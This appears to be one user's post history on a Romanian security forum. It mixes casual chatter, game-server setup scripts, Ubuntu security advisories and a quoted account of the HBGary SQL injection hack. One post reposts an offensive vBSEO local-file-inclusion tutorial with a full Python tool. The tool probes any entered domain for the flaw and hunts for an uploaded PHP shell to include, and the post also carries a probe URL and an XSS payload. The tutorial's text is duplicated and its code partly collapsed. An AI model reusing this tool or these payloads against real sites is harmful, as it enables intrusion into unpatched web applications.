Flubber
-
Posts
1765 -
Joined
-
Last visited
-
Days Won
11
Posts posted by Flubber
-
-
Epic.
Un video tipic manipularii, American "dream":
-
Exact! HBGary. Nici eu nu stiam cine dracu o fi si asta, pana ce am citit tot articolul (aproape) primit prin RSS; este epic. Este exact ce au descris membrii old school din scena. Mai tineti minte? Si citez:
Ca cei din Anonymous s-au folosit de o vulnerabilitate SQLi in CMS pentru a realiza deface-ul respectiv, nu este o scuza pentru un 'super expert in securitate' ce lucreaza la o firma care are contracte cu FBI,NSA etc. Partea si mai interesanta este cand practica social engineering pe unul din angajatii respectivi, care a muscat momeala,si a DEZACTIVAT FIREWALL-UL permitand accesul SSH DE ORIUNDE. Fail.The fact is that hackers, mostly on an individual basis, decided to
use their passion as a source of income. Whether this is good, bad,
or just pragmatic is completely irrelevant. Nearly all the hackers that
could get jobs did. For the individuals that decision has been made (for
better or worse), and in general there's nothing that will change this.
This was a hacker exodus. What really mattered was not the loss of any
individuals, but the cumulative effect this had on the underground. The
more hackers that left the underground for a corporate life, the fewer
that came in. And those who stayed became entrenched, increasingly
disconnected.
Din acest articol:
Sursa: Full Disclosure: What the f*** is going on? (destul de amuzant cum se enerveaza cei de genul)Anonymous: more than kids
HBGary and HBGary Federal position themselves as experts in computer security. The companies offer both software and services to both the public and private sectors. On the software side, HBGary has a range of computer forensics and malware analysis tools to enable the detection, isolation, and analysis of worms, viruses, and trojans. On the services side, it offers expertise in implementing intrusion detection systems and secure networking, and performs vulnerability assessment and penetration testing of systems and software. A variety of three letter agencies, including the NSA, appeared to be in regular contact with the HBGary companies, as did Interpol, and HBGary also worked with well-known security firm McAfee. At one time, even Apple expressed an interest in the company's products or services.
[...]
Time for an injection
HBGary Federal's website, hbgaryfederal.com, was powered by a content management system (CMS). CMSes are a common component of content-driven sites; they make it easy to add and update content to the site without having to mess about with HTML and making sure everything gets linked up and so on and so forth. Rather than using an off-the-shelf CMS (of which there are many, used in the many blogs and news sites that exist on the Web), HBGary—for reasons best known to its staff—decided to commission a custom CMS system from a third-party developer.
Unfortunately for HBGary, this third-party CMS was poorly written. In fact, it had what can only be described as a pretty gaping bug in it. A standard, off-the-shelf CMS would be no panacea in this regard—security flaws crop up in all of them from time to time—but it would have the advantage of many thousands of users and regular bugfixes, resulting in a much lesser chance of extant security flaws.
The custom solution on HBGary's site, alas, appeared to lack this kind of support. And if HBGary conducted any kind of vulnerability assessment of the software—which is, after all, one of the services the company offers—then its assessment overlooked a substantial flaw.
The hbgaryfederal.com CMS was susceptible to a kind of attack called SQL injection. In common with other CMSes, the hbgaryfederal.com CMS stores its data in an SQL database, retrieving data from that database with suitable queries. Some queries are fixed—an integral part of the CMS application itself. Others, however, need parameters. For example, a query to retrieve an article from the CMS will generally need a parameter corresponding to the article ID number. These parameters are, in turn, generally passed from the Web front-end to the CMS.
SQL injection is possible when the code that deals with these parameters is faulty. Many applications join the parameters from the Web front-end with hard-coded queries, then pass the whole concatenated lot to the database. Often, they do this without verifying the validity of those parameters. This exposes the systems to SQL injection. Attackers can pass in specially crafted parameters that cause the database to execute queries of the attackers' own choosing.
The exact URL used to break into hbgaryfederal.com was www.hbgaryfederal.com is offline. The URL has two parameters named pageNav and page, set to the values 2 and 27, respectively. One or other or both of these was handled incorrectly by the CMS, allowing the hackers to retrieve data from the database that they shouldn't have been able to get.
Articol complet (3 pagini): Anonymous speaks: the inside story of the HBGary hack
// LE: Am uitat sa mentionez ca mega expertul in securitate taxa sume imense de bani pentru niste simple scan-uri cu NMAP!
-
Thread din 2008! Nu inviati mortii fiindca nu, nu inseamna ca vine Iisus pe pamant, ci ca se vor transforma in zombie!
-
Ce va bagati aiurea in seama pizdelor ?
Stii vorba aia 'Râde ciob de oal? spart?.'? Cam pe asta o aplici tu acum.
Cu thread-ul asta de cacat ce vrea sa fie un 'prank' elaborat, mi-ai mai irosit inca 2 minute din viata (a trebuit sa scriu si postul asta, nu?). Cat despre a cere sfaturi, nu e nimic gresit in asta, poate doresti mai multe opinii de pretitundeni pentru a ajunge la un rezultat final, ti-ai pus neuronul salbatic si singurel la lucru sa iei concluzia asta in calcul? Nu prea! Bad, bad, bad!
-
Kinda old. 3rd August 2010
Some time ago, an LFI vulnerability within vBSEO was discovered, which allowed an attacker to include locally hosted files. The challenge, when confronted with an LFI vulnerability, is to leverage it into executing arbitrary code of our choosing.
Many vBulletin installations are using this addon to improve their SEO drastically, however many of them are not fully patched which is good for us, but very bad for those that host a vulnerable web application.
vBulletin – Not So Secure Anymore
3rd August 2010 - by MaXe Tags: Exploit, WebApps
Some time ago, an LFI vulnerability within vBSEO was discovered, which allowed an attacker to include locally hosted files. The challenge, when confronted with an LFI vulnerability, is to leverage it into executing arbitrary code of our choosing.
Many vBulletin installations are using this addon to improve their SEO drastically, however many of them are not fully patched which is good for us, but very bad for those that host a vulnerable web application.
In many cases, it is not piece of cake to exploit LFI, aka Local File Inclusion, vulnerabilities due to the fact it may not be easy to upload content to the target server. In some scenarios, it is possible to inject PHP code into access logs and in others, it is possible to include binary MySQL files. It should be noted though, that it is usually impossible to always know where these files are stored.
Of course, we can guess where these files are stored, but we may still not be sure how the server is configured and if this approach will work.
Reconnaissance
First, we need to determine whether our target is vulnerable or not. This can be done by requesting to include a local script in the following manner:
http://our-target.tld/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html
vBulletin – Not So Secure Anymore
3rd August 2010 - by MaXe Tags: Exploit, WebApps
Some time ago, an LFI vulnerability within vBSEO was discovered, which allowed an attacker to include locally hosted files. The challenge, when confronted with an LFI vulnerability, is to leverage it into executing arbitrary code of our choosing.
Many vBulletin installations are using this addon to improve their SEO drastically, however many of them are not fully patched which is good for us, but very bad for those that host a vulnerable web application.
In many cases, it is not piece of cake to exploit LFI, aka Local File Inclusion, vulnerabilities due to the fact it may not be easy to upload content to the target server. In some scenarios, it is possible to inject PHP code into access logs and in others, it is possible to include binary MySQL files. It should be noted though, that it is usually impossible to always know where these files are stored.
Of course, we can guess where these files are stored, but we may still not be sure how the server is configured and if this approach will work.
Reconnaissance
First, we need to determine whether our target is vulnerable or not. This can be done by requesting to include a local script in the following manner:
http://our-target.tld/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html
Please note that some installations may appear to be vulnerable even though they’re not.
From our basic check above, we would like to test whether our target really is vulnerable to Local File Inclusions. We do this by creating a small txt file with ‘phpinfo()’ in it which we will upload to our target via the attachment manager. Some vBulletin installations store attachments locally, which can be abused in this case to include a shell or similar malicious code IF we know the physical location of our file and if there’s a vulnerability which allows us to do that.
Exploitation
In order to find the physical location of our uploaded file we need to find the attachment directory and scan through the subdirectories. I’ve created a small tool for this task, which is far from complete but it does work on some hosts. You can get the basic version is as follows:
#!/usr/bin/python
# ______ __ __ __ __ ______
# /\__ _\ /\ \__ /\ \/\ \ /'__`\/\__ _\
# \/_/\ \/ ___\ \ ,_\ __ _ __\ \ `\\ \/\ \/\ \/_/\ \/
# \ \ \ /' _ `\ \ \/ /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \
# \_\ \__/\ \/\ \ \ \_/\ __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \
# /\_____\ \_\ \_\ \__\ \____\\ \_\ \ \_\ \_\ \____/ \ \_\
# \/_____/\/_/\/_/\/__/\/____/ \/_/ \/_/\/_/\/___/ \/_/
# --------------------------------------------------------
# Title: vBSEO LFI Assistant Tool
# Author: MaXe
# Site: http://www.intern0t.net
#
# Description: 1) Checks whether the vBSEO installation
# is patched or not. 2) Attempts to find
# the physical location of an uploaded
# attachment phile. (PHP Shell)
#
# Version: 2.1.4 - Reversed Algorithm - Basic Version
#
# License: -- Attribution-ShareAlike 3.0 Unported --
# http://creativecommons.org/licenses/by-sa/3.0/
#
# Notes: The basic version does not contain multi-
# threading nor is it able to search through
# multiple sub directories which the advanced
# version will be able to.
# Please note, that this tool does not work on
# all types of hosts and you should therefore
# modify this script to your own needs.
#
# Disclaimer: This tool is meant for ethical purposes only.
# Import the appropriate libraries.
import os
import re
import httplib
import sys
# Clear the screen in a sufficient way.
if(os.name) == "posix":
os.system("clear")
elif(os.name) == "nt":
os.system("cls")
else:
print "[!] Cannot clear screen automatically.\n"
print "File Finder by MaXe from InterN0T.net\n\n"
# Get user-input and define global variables.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
main_dir = ["attach","attachment","attachments","download"]
poss_main_dir = []
sub_dir = []
# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)
# Perform a simple LFI to check whether the target is vulnerable or not.
conn = httplib.HTTPConnection(newtarget, 80)
print "
[*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()
# If the response code is 200 OK, check if the file really was included.
if resp.status == 200:
print "[+] Site is responding, this is good."
if re.search("(Enter text...)", resp.read()):
print ">> The site appears to be vulnerable!"
else:
print "[!] The site appears to be patched. (unknown error)"
elif resp.status == 404:
print "[!] The site appears to be patched. (404)"
# Search for attachment directories
for value in main_dir[0:]:
conn = httplib.HTTPConnection(newtarget, 80)
print "
[*] Trying: http://%s/%s/" % (newtarget,value)
conn.request("HEAD", "/%s/" % value)
resp = conn.getresponse()
# If the response code is 403 (Forbidden), set a new variable and continue.
if resp.status == 403:
print "[+] Directory found: /%s/" % value
if poss_main_dir == []:
poss_main_dir = ["%s" % value]
else:
poss_main_dir += ["%s" % value]
conn.close()
if poss_main_dir == []:
print "[!] No directories were found, exiting."
sys.exit()
# Search for possible sub directories
for value in poss_main_dir:
i = 0
print "
[*] Trying subdirs within: http://%s/%s/" % (newtarget,value)
while i <= 9: conn = httplib.HTTPConnection(newtarget, 80) conn.request("HEAD", "/%s/%s/" % (value,i)) resp = conn.getresponse() if resp.status == 403: print "[+] Sub Directory found: /%s/%s/" % (value,i) found = "%s/%s" % (value,i) if sub_dir == []: sub_dir = ["%s" % found] else: sub_dir += ["%s" % found] i=i+1 conn.close() if sub_dir == []: print "[!] No sub directories were found, exiting." sys.exit() # Search all the sub directories found for our phile for value in sub_dir[0:]: i = 99 print "
[*] Trying to find our file within: /%s/" % value while i >= 0:
conn = httplib.HTTPConnection(newtarget, 80)
conn.request("GET", "/%s/%s.attach" % (value,i))
resp = conn.getresponse()
if resp.status == 200:
print "[+] File found, does it match our keyword? >>%s" % file_match
if re.search("(%s)" % file_match, resp.read()):
print ">> File contains our keyword!"
print "Part URL: /%s/%s.attach" % (value,i)
print "Full URL: http://" + newtarget + "/%s/%s.attach \n" % (value,i)
sys.exit(0)
i=i-1
conn.close()
# Don't forget, that this script can be used for more than one thing.Sursa: vBulletin – Not So Secure Anymore
Autor: MaXe
-
Ai PM.
Thanks 4 the challenge.
-
Offtopic: s-a ales prafu de acest thread, e o combinatie de romana,engleza si video.
Nu s-a ales praful deloc, cine vrea sa invete ASM si RE trebuie sa stie engleza (ca vrea, ca nu vrea). Acum, in opinia mea pentru incepatori (ca si mine) era bine daca explica cineva (pe intelesul tuturor) cum functioneaza CPU (incluzand registrii, cache-urile level 1 si level 2, arithmetic logic unit, cum cauta in memoria ram prin data bus, cum functioneaza mai exact stack-ul si asa mai departe), fiindca sunt notiuni de baza, si trebuie sa le intelegi din moment ce CPU-ul iti returneaza valorile vazute in debugger, prin ASM intelegand toate 'comenzile' gen JMP,CMP,SUB,ADD etc.
Acum nu stiu pe cati ar interesa asa ceva, fiindca o sa se spuna 'da, dar mi se rupe mie ca CPU-ul are ALU si ca face 5.000.000.000.000.000.000 (not sure) calcule pe secunda doar ca sa imi arate mie pe ecran "X" la bara de sus a ferestrei cu pr0n. Cum am mai spus, depinde de fiecare, daca doreste sa aiba si cunostinte in legatura cu ce se intampla 'under the hood'.
// LE: un alt video ce arata cum se face un crack pentru jocul (destul de vechi -- data lansarii: 1999; lul) Caesar 3 dar arata acelasi principiu pe care l-a folosit si phantomas90
-
"Well, at least "><script>alert(/XSS/)</script> works great:
http://img6.imagebanana.com/img/4tyst18d/one.png
http://img6.imagebanana.com/img/wh9zwmc6/two.png
Thx to Friedrich Hausberger for his mail to FD
ck"
Sursa: Full Disclosure: [Google Chrome Browser] Google Mail Checker Plus: JavaScript Code Execution
-
Sa traiesti o mie de ani!
-
Citeste Sigmund Freud(toata opera-7 volume) si atunci o sa crezi si tu in acel "omulet verde". Cred ca profesorul tau la asta se refera. Freud vorbeste de SINE,EU,SUPRAEU. Iar acel "supraeu" este cel care dicteaza alegerile, gesturile. Multi il asimileaza cu constiinta dar nu este chiar constiinta.
Dar prima data intreaba-l ce a citit: Freud sau Nietzsche? Daca iti zice ca Nietzsche poti sa te rogi sa-ti dea 5-ul, decat sa stai sa citesti asa ceva.(off: Hitler s-a inspirat din opera lui Nietzsche).
Deci ca raspuns ii zici ca exista in opinia unora si nu exista in opinia altora(depinde conform carei teorii privim problema).
Teoria haosului: "tot ce se intampla are un pattern"=> suntem doar niste actori in viata si actiunile noastre sunt predfinite.=> omuletul nu exista.
carl jung: bazele psihologiei: omul se naste cu un caracter, isi formeaza pe parcurs temperamentul in functie de mediu, este influentat la maturitate de traumele din copilarie(cf Freud)=> omuletul exista.
(detaliez daca vrei)
Foarte interesant. Multumesc.
On topic: prima data si eu am crezut ca vorbeste de subconstient si cum 'dicteaza' acesta pe fiecare in functie de caracteristicile lui, dar cand am citit ca fizic nu poate fi gasit, mi-a rupt inima in doi. Drept care, ceea ce nu poti vedea, dar este prezent la cineva, asa cum s-a mentionat este temperamentul, caracterul, personalitatea, toate acestea influentate de societatea si mediul in care traieste. Daca stai sa te gandesti bine, si s-ar putea sa spun o prostie (ce daca), chiar si temperamentul, caracteristicile si asa mai departe sunt rezultatul unor retele neuronale (in continua "schimbare" -- de-aia cateodata ne "schimbam" pentru o perioada de timp, atunci cand (daca ati observat) ne place la cineva ceva anume si tindem sa copiem la caracterul nostru (asa devin unii oameni snobi)), cum reactionezi tu la anumite situatii (iubire, ura si asa mai departe) este rezultatul unor substante eliberate de catre creierul tau prin intermediul inimii (asa se cam raspandeste in tot sistemul).
Cum am spus, s-ar putea sa vorbesc aiurea, chiar rog sa ma corecteze cineva sau sa aduca obiectii (cu argumente), mi-a starnit rau curiozitatea profesorul tau.
-
Eu am gasit site-ul asta Minecraft dar nu apar zombie etc )
http://www.sendspace.com/file/v74wwm
Pentru client (game) un script bash simplu:
#!/bin/bash
echo "Starting client."
java -jar MinecraftSP.jar^ ai nevoie de java instalat
sudo apt-get update
sudo apt-get install sun-java6-jre sun-java6-pluginPentru server:
#!/bin/bash
echo "Starting server."
java -Xmx1024M -Xms1024M -jar minecraft_server.jar noguiPrima oara il rulezi apoi scrii "stop" dupa ce a terminat de generat mapa si incarcat resursele.
Apoi in folder o ti se faca niste fisiere, printre care "server.properties"
Editeaza-l:
#Minecraft server properties
#Wed Feb 16 23:49:36 EET 2011
level-name=world
hellworld=false
spawn-monsters=true
online-mode=false
spawn-animals=true
max-players=20
server-ip=IP-UL SERVER-ULUI
pvp=false
server-port=25565Vezi care sunt diferentele, nu mai retin cum era originalul.
Have fun!
// Server-ul este doar daca vrei sa mai joci cu cineva (in multiplayer), doar cu client-ul poti juca si singleplayer.
-
Si care-i scopul in jocul asta?am vazut mai multe discutii pe HF despre joc dar nu le-am bagat in seama.
Este un fel de ... Diablo as putea spune (e mult zis dar intelegi ideea), poti distruge copaci sa faci rost de lemne, cu lemne si cu piatra iti faci sabie (a.k.a. CRAFTING), si asa mai departe, pe timp de zi iei aceste decizii fiindca atunci cand se lasa noaptea ies zombie la omorat (la propriu). Am jucat o ora, am avut 2 crash-uri, il rulez pe Ubuntu 10.04.2 LTS, a treia oara am inchis Pidgin, Akregator etc. si nu am mai avut probleme. Simpatic jocul, in seara asta il rup iar, dar totusi, sa faci intr-un asemenea joc un CPU intreg (cu ALU) si separat memoria (RAM) fara sa o incluzi pe cea rezervata registrilor? Talentat baiatul ala, le stie ca pe propria-i palma xD.
-
... cuvinte? Nu sunt.
1.
2.
3.
4.
+
+ http://www.youtube.com/watch?v=uIhdP9ylRxEI mean... WHAT THE 0xFFFFFFFF?
-
2 urate.
1.
2.===========================================================
Ubuntu Security Notice USN-1064-1 February 15, 2011
openssl vulnerability
CVE-2011-0014
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 10.04 LTS
Ubuntu 10.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 10.04 LTS:
libssl0.9.8 0.9.8k-7ubuntu8.6
Ubuntu 10.10:
libssl0.9.8 0.9.8o-1ubuntu4.4
After a standard system update you need to reboot your computer to make
all the necessary changes.
Details follow:
Neel Mehta discovered that incorrectly formatted ClientHello handshake
messages could cause OpenSSL to parse past the end of the message.
This could allow a remote attacker to cause a crash and denial of
service by triggering invalid memory accesses.
===========================================================
Ubuntu Security Notice USN-1065-1 February 15, 2011
shadow vulnerability
CVE-2011-0721
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 9.10:
passwd 1:4.1.4.1-1ubuntu2.2
Ubuntu 10.04 LTS:
passwd 1:4.1.4.2-1ubuntu2.2
Ubuntu 10.10:
passwd 1:4.1.4.2-1ubuntu3.2
In general, a standard system update will make all the necessary changes.
Details follow:
Kees Cook discovered that some shadow utilities did not correctly validate
user input. A local attacker could exploit this flaw to inject newlines into
the /etc/passwd file. If the system was configured to use NIS, this could
lead to existing NIS groups or users gaining or losing access to the system,
resulting in a denial of service or unauthorized access.
Update & packet upgrade:
sudo apt-get update
sudo apt-get upgrade
sudo apt-get clean
sudo apt-get autoclean
sudo apt-get autoremove
sudo shutdown -r 0 -- restart
^ sau: sudo rebootPrimite via RSS
-
Au arhiva online la emisiune.
http://inregistrari.antena3.ro/view-In_gura_presei_cu_Mircea_Badea-5.html
Mai exact: http://inregistrari.antena3.ro/view-15_Feb-2011-In_gura_presei_cu_Mircea_Badea-5.html
De la minutul 37:08.
Doza de ras.
-
Foarte bun experimentul, felicitari.
Sper sa fi invatat cate ceva fiecare, totusi e trist cum vezi lumea ca scrie comment-uri pe diferite blog-uri:
Si altele de genul,irosindu-si timpul fara sa invete ceva cu adevarat, ceva ce le-ar folosii si le-ar tine pasiunea (presupunand ca au una; de-aia si stau acolo, sa o satisfaca) in flacari."Bine ba! L-ai dovedit."
"Asa, foarte bine, si asa ma enerva X."
Apoi replica lui Badea: "Idiotii de pe planeta <yada yada yada>" la care turma de oi:
"Ce idioti hahaha."
"Bai Badea, scoate-le link-urile de pe blog ca le faci trafic! De ce sa scada in rank?" // creasca -- 1 e locul cel mai bun, pornesti de sus locul 55555555555555555 apoi scazi
-
La cat mai multe. Lena e awesome!
-
Mask: 255.255.255.0
Nu 255.255.252.0!
Lo-ul lasa-l pe default cum este (loopback), modifica doar eth0 si incearca din nou.
Cat despre modem-ul UPC, ai vreo foaie anume cu IP-uri (statice, nu se schimba la restart) si netmask/dns servers, sau ai user si parola ca la RDS, ti se aloca IP dinamic (dupa reconectare ti se alocheaza un alt IP)? Fiindca din poza, pari a avea unul static.
-
pai te faci root inainte si o sa mearga
Prin comanda "sudo su" iar apoi scrii parola.
-
O lista "mica".
+ CMS si Forums: http://img696.imageshack.us/img696/3658/listofalgorithm3.jpg
Link preluat de fapt de pe Hashkiller - Index - MD5 cracken at hashkiller.com
- 1
-
Trebuie:
- intuneric
- pat
- o patura
- casti ce pot reda anumiti hertzi (daca pot reda intre 10hz/20hz si 20khz sunt ok)
- liniste (foarte important)
Se aplica: una bucata droaga, nu dai play, te intinzi in pat, pui castile si dai play (daca ai laptop), daca nu ai laptop dai play apoi te faci comod, sa fie intuneric (recomandat), liniste (foarte important) iar in tot procesul nu faci nimic altceva decat sa le asculti, SI SA NU TE INTRERUPA NIMENI! daca te mananca ceva (in cur) te abtii, uiti. Have fun.
Q: Does I-Doser really works?A: To a point, yes. I-Doser strongly differs between individuals. Some people cannot accept the signals into their brain. In all the people I've shown it to, the smarter ones that couldn't control their thoughts and didn't stop thinking long enough for their brain to process the signals, just didn't work. The best way to make I-Doser work for you is to get in a dark room, relax, close your eyes, and do NOT think about anything. Then put on some headphones (THEY HAVE TO BE HEADPHONES, SPEAKERS WILL NOT WORK!) and just listen to the "track". Also Don't watch YouTube videos of it. If you watch other people do it, you set little expectations in your head that are too high, and if you do that, then your brain won't feel anything, making you not feel anything.
From the I-Doser website:
"Brainwave synchronization (entrainment) may be achieved when audio signals are introduced to the brain causing a response directly related to the frequency of the signal introduced, called binaural beats. Two tones close in frequency generate a beat frequency at the difference of the frequencies, which is generally subsonic. For example, a 500 Hz tone and 510 Hz tone will produce a subsonic 10 Hz tone, roughly in the middle of the alpha range. The resulting subsonic tone may affect the state of mind of the subject. The "carrier frequency" (i.e. the 500 Hz in the example above), is also said by some to affect the quality of the trans formative experience."
-
@little123 si cu root pe linux si cu admin pe windows ai control asupra sistemului. asa si ? ce faci cu ele daca nu le stii folosi. in directia aceea am vrut sa bat
Administrator pe Windows® e una, si sa fi SYSTEM pe Windows® e alta.
-
A venit si episodul 3 YouTube - RObotzi.S01.Ep3.Prieten
Defapt, este episodul 4.
(Chiar daca 0 se considera Pilot, nu?)
-
Te uiti la OTV prea mult...
LE:Romanu' descopera ceva ,nu este luat in considerare, si peste cativa ani vine americanu',canadianu' si nu mai stiu eu cine mai pune un surub /niste apa la ce a descoperit romanu' si e descoperirea lor nu a noastra
Asta inseamna ca si profesorul meu de limba si literatura romana se uita prea mult la OTV?
Ia sa faci tu cateva cercetari mai amanuntite.
Cat despre televizor? Nu ma mai uit de foaaarte mult timp, stai linistit.
[USN-1071-1] Linux kernel vulnerabilities
in Stiri securitate
Posted
Ubuntu Security Notice. Este vorba de Ubuntu 6.06 LTS, destul de vechi, dar daca foloseste cineva (motiv: sistem cu performanta scazuta?), se recomanda un update & upgrade.
Via RSS.